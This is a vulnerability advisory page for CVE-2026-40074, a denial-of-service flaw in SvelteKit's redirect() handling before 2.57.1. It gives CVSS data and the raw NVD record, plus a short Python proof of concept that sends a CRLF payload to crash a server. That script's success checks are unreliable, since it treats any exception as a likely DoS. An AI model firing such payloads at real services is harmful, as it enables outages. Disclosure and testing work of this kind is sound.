CVE-2026-40074

Description

SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, redirect, when called from inside the handle server hook with a location parameter containing characters that are invalid in a HTTP header, will cause an unhandled TypeError. This could result in DoS on some platforms, especially if the location passed to redirect contains unsanitized user input. This vulnerability is fixed in 2.57.1.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:svelte:kit:*:*:*:*:*:node.js:*:* - VULNERABLE

SvelteKit < 2.57.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://localhost:5173"

# Payload containing invalid HTTP header characters (newline)
# The vulnerability triggers when redirect is called with this input in handle hook
malicious_payload = "/valid-path?redirect=\r\n"

try:
    # Sending request to trigger the vulnerability
    # Assuming the app reflects this param into a redirect
    response = requests.get(target_url + malicious_payload)

    # Check if service is down or error occurred
    if response.status_code == 500 or response.status_code == 0:
        print("[+] Vulnerability triggered: Server error or timeout.")
    else:
        print("[-] Vulnerability not triggered or patched.")
except Exception as e:
    print(f"[+] Connection failed (Possible DoS): {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40074
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40074
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40074/
[4] VulDB https://vuldb.com/cve/CVE-2026-40074
[5] https://github.com/sveltejs/kit/commit/10d7b44425c3d9da642eecce373d0c6ef83b4fcd
[6] https://github.com/sveltejs/kit/releases/tag/@sveltejs/[email protected]
[7] https://github.com/sveltejs/kit/security/advisories/GHSA-3f6h-2hrp-w5wx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40074", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:12.513", "lastModified": "2026-04-15T19:01:50.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, redirect, when called from inside the handle server hook with a location parameter containing characters that are invalid in a HTTP header, will cause an unhandled TypeError. This could result in DoS on some platforms, especially if the location passed to redirect contains unsanitized user input. This vulnerability is fixed in 2.57.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-755"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:svelte:kit:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.57.1", "matchCriteriaId": "CC23CF52-37C9-4CA0-91A7-DF09E36C7886"}]}]}], "references": [{"url": "https://github.com/sveltejs/kit/commit/10d7b44425c3d9da642eecce373d0c6ef83b4fcd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sveltejs/kit/releases/tag/@sveltejs/[email protected]", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/sveltejs/kit/security/advisories/GHSA-3f6h-2hrp-w5wx", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}